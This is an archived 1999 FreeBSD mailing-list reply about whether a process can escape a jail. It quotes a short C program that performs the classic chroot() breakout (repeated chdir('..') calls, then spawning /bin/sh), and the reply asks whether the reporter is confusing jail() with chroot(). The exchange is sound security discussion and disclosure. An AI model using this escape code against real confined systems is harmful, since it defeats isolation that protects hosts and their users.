From owner-freebsd-hackers Sat Sep 25 6:41:20 1999 Delivered-To: freebsd-hackers@freebsd.org Received: from foobar.franken.de (foobar.franken.de [194.94.249.81]) by hub.freebsd.org (Postfix) with ESMTP id 3C7F314A04; Sat, 25 Sep 1999 06:41:03 -0700 (PDT) (envelope-from logix@foobar.franken.de) Received: (from logix@localhost) by foobar.franken.de (8.8.8/8.8.5) id PAA14293; Sat, 25 Sep 1999 15:38:29 +0200 (CEST) Message-ID: <19990925153829.B14097@foobar.franken.de> Date: Sat, 25 Sep 1999 15:38:29 +0200 From: Harold Gutch To: Alexander Bezroutchko , freebsd-security@FreeBSD.ORG, freebsd-hackers@FreeBSD.ORG Subject: Re: about jail References: <199909251302.RAA58030@grendel.sovlink.ru> <19990925171712.A80535@zenon.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <19990925171712.A80535@zenon.net>; from Alexander Bezroutchko on Sat, Sep 25, 1999 at 05:17:12PM +0400 Sender: owner-freebsd-hackers@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Sat, Sep 25, 1999 at 05:17:12PM +0400, Alexander Bezroutchko wrote: > * it is possible to escape from jail > Following program escapes from jail (tested under 4.0-19990918-CURRENT): > > /* --- start of example ------------------------- */ > #include > #include > > const char *shell = "/bin/sh"; > const char *lowerdir = "/tmp"; > > int main() { > int i; > > assert(chdir("/") != -1); > assert(chroot(lowerdir) != -1); > for (i = 0; i < 32; i++) > assert(chdir("..") != -1); > assert(chroot(".") != -1); > > assert(execl(shell, shell, NULL) != -1); > }; > /* --- end of example --------------------------- */ > I don't run -CURRENT, so I can't test this - but this is the standard chroot()-breakout, and you're saying that using it you can break out of a _jail_ aswell ? Or are you simply mixing up jail() and chroot() ? bye, Harold -- Sleep is an abstinence syndrome wich occurs due to lack of caffein. Wed Mar 4 04:53:33 CET 1998 #unix, ircnet To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-hackers" in the body of the message